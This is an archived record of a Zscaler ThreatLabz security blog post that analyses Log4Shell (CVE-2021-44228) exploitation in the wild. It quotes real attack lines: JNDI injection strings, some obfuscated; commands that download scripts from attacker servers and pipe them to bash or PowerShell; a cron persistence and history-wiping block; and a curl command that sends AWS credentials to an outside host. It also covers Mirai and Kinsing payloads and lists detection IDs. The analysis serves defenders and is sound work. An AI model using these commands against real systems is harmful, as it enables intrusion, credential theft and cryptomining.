{
	"id": "278e16f5-11fd-481c-977b-773678aa3b73",
	"created_at": "2026-04-06T00:09:45.747533Z",
	"updated_at": "2026-04-10T13:12:18.506593Z",
	"deleted_at": null,
	"sha1_hash": "8334ef48c25d0e88417421dd67ef726cdf916a15",
	"title": "ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1157444,
	"plain_text": "ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts |\r\nZscaler\r\nBy Rubin Azad\r\nPublished: 2021-12-15 · Archived: 2026-04-05 22:37:21 UTC\r\nThe Zscaler ThreatLabz team has been actively monitoring exploit attempts related to the Apache Log4j 0-day Remote Code\r\nExecution Vulnerability (CVE-2021-44228), also known as “Log4Shell.”\r\nIn this blog we will share our analysis of the exploit payloads being delivered using this vulnerability. We will continue to\r\nupdate this blog and share more details as we uncover them during our analysis. \r\nThreatlabz has also published a security advisory related to this vulnerability.\r\nWhat is causing this vulnerability?\r\nThere is a flaw in the Log4j logging library (version 2.0 to 2.15) where an attacker can control log message parameters to\r\nexecute arbitrary code loaded from various JNDI endpoints such as HTTP, LDAP, LDAPS, RMI, DNS, IIOP, etc.\r\nA majority of the exploit payloads seen early on after the patch was released by Apache used HTTP and LDAP protocols to\r\nfetch malicious payloads from attacker server. However, we have now started seeing the use of additional protocols\r\nincluding RMI, DNS, and IIOP to download malicious payloads onto vulnerable servers.\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 1 of 8\n\nLog4j Exploit chain: how it works\r\nThe attacker sends maliciously crafted HTTP requests to a web application server running the vulnerable Log4j utility. Once\r\nthe request is received, Log4j tries to load the JNDI resource from an attacker-controlled server and—depending upon the\r\ntype of protocol used—loads additional components. 
These components can include a shell script or a Java class that writes a file to disk or memory and executes the final payload.\r\nWe have observed multiple botnets, including Mirai and Kinsing (cryptomining), leveraging this Log4j exploit to target vulnerable servers on the Internet. In addition to the Mirai and Kinsing families, we have also seen reports of CobaltStrike and ransomware-related activity from these exploits.\r\nExploit Commands Observed\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7...\r\n\u003e wget http://62.210.130[.]250/lh.sh;chmod +x lh.sh;./lh.sh\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMj...\r\n\u003e wget -q -O- http://62.210.130[.]250/lh.sh|bash\r\n${jndi:ldap://92.242.40.21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3...\r\n\u003e (curl -s 92.242.40[.]21/lh.sh||wget -q -O- 92.242.40[.]21/lh.sh)\r\nThreat actors also appear to be leveraging network fingerprinting techniques before serving stage 2 payloads. The injected command includes the victim server's IP/port information, which is checked before malicious payloads are served, as seen below.\r\n${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1Lj…\r\n\u003e (curl -s 45.155.205[.]233:5874/||wget -q -O- 45.155.205[.]233:5874/)|bash\r\nPayload analysis\r\n#1 Mirai Botnet\r\nThe shell script lh.sh (MD5: cf2ce888781958e929be430de173a0f8) is downloaded from 62.210.130[.]250 (attacker server). When executed, this bash script downloads multiple Linux binary payloads onto the victim machine. The script also sets execute permissions for the downloaded payloads and runs them. 
\r\nwget http://62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;\r\nwget http://62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;\r\nwget http://62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;\r\nAll of these binaries belong to the Mirai botnet family and share the same code structure. They are compiled for different architectures (x86 32-bit and 64-bit). There is no code to check the architecture; instead, the attacker intends to run all of the binaries, hoping one of them will succeed.\r\nThese Mirai binaries were configured to communicate with the C2 domain nazi[.]uy on port 25565 and support the following commands from the attacker:\r\nUDP flood\r\nSYN flood\r\nACK flood\r\nTCP stomp flood\r\nGRE IP flood\r\nConnect flood\r\n#2 Kinsing Malware\r\nThe shell script lh2.sh (MD5: 0579a8907f34236b754b07331685d79e) is downloaded from 92.242.40[.]21/lh2.sh. It belongs to the Kinsing malware family, which is essentially a coinminer with rootkit capabilities.\r\nThe stage 1 bash script (lh2.sh) stops and disables multiple security processes on the victim server before downloading the Kinsing binary. This is to ensure that the malicious payload is not detected and blocked from execution.\r\nKinsing is a Golang-based coin miner, as shown below:\r\n92.242.40.21_kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped\r\nThe bash script also establishes persistence by adding a cronjob that periodically downloads and executes updated versions of the bash script from a remote location.\r\nPersistence\r\nif [ $? 
-eq 0 ]; then\r\necho \"cron good\"\r\nelse\r\n(\r\ncrontab -l 2\u003e/dev/null\r\n  echo \"* * * * * $LDR http://185.191.32[.]198/lh.sh | sh \u003e /dev/null 2\u003e\u00261\"\r\n) | crontab -\r\nfi\r\nhistory -c\r\nrm -rf ~/.bash_history\r\nhistory -c\r\nHere, the $LDR value is derived from the victim environment and can be either \"wget -q -O -\" or \"curl\". 185.191.32[.]198/lh.sh downloads and executes the latest Kinsing binary, but from 80.71.158[.]12/kinsing.\r\n#3 Credential Stealing\r\nWe also observed a few instances where AWS credentials are being stolen and sent to an attacker-controlled domain:\r\n${jndi:ldap://176.32.33.14/Basic/Command/Base64/Y3VybCAtZCAiJChjYXQgfi8uYXdzL2NyZWRlbnRpYWxzKSIga…\r\n\u003e curl -d \"$(cat ~/.aws/credentials)\" https://c6td5me2vtc0000aq690gdpg14eyyyyyb[.]interactsh[.]com\r\n#4 Monero Miner\r\nWe noticed that the exploitation is not just impacting Linux servers but also targeting Windows servers running vulnerable versions.\r\nThe Windows batch file mine.bat (MD5: 3814f201a07cf1a2d5c837c8caeb912f) is downloaded from lurchmath[.]org/wordpress-temp/wp-content/plugins/mine.bat via PowerShell. 
The downloaded file is a Monero miner and uses the wallet address 42JKzDhbU76Wbf7JSDhomw6utwLr3N8tjZXLzLwvTcPuP5ZGZiJAHwnD7dNf2ZSAh52i9cUefq2nmLK3azKBffkBMX5b1LY\r\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://142.44.203[.]85:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtQ29t...\r\n\u003e powershell -Command \"$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://lurchmath[.]org/wordpress-temp/wp-content/plugins/mine.bat', $tempfile); \u0026 $tempfile 42JKzDhbU76Wbf7JSDhomw6utwLr3N8tjZXLzLwvTcPuP5ZGZiJAHwnD7dNf2ZSAh52i9cUefq2nmLK3azKBffkBMX5b1LY\r\nRemove-Item -Force $tempfile\"\r\nFor comparison, mine.bat is similar to the script found at hxxps://github.com/MoneroOcean/xmrig_setup/blob/master/setup_moneroocean_miner.bat\r\nMore updates to follow.\r\nZscaler Detections\r\nThreatName DetectionID Type Of Detection\r\nApache.Exploit.CVE-2021-44228 47673 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47674 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47675 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47676 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47677 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47707 IPS Web - URL\r\nApache.Exploit.CVE-2021-44228 47708 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47711 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47801 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 124803 File-Content (Yara)\r\nApache.Exploit.CVE-2021-44228 - File Reputation\r\nLinux.Trojan.Mirai - File Reputation\r\nLinux.Trojan.Mirai.LZ - URL Reputation\r\nLinux.Rootkit.Kinsing - File Reputation\r\nLinux.Rootkit.Kinsing.LZ - URL 
Reputation\r\nIndicators Of Compromise\r\nSource: https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts"
	],
	"report_names": [
		"threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434185,
	"ts_updated_at": 1775826738,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.pdf",
		"text": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.txt",
		"img": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.jpg"
	}
}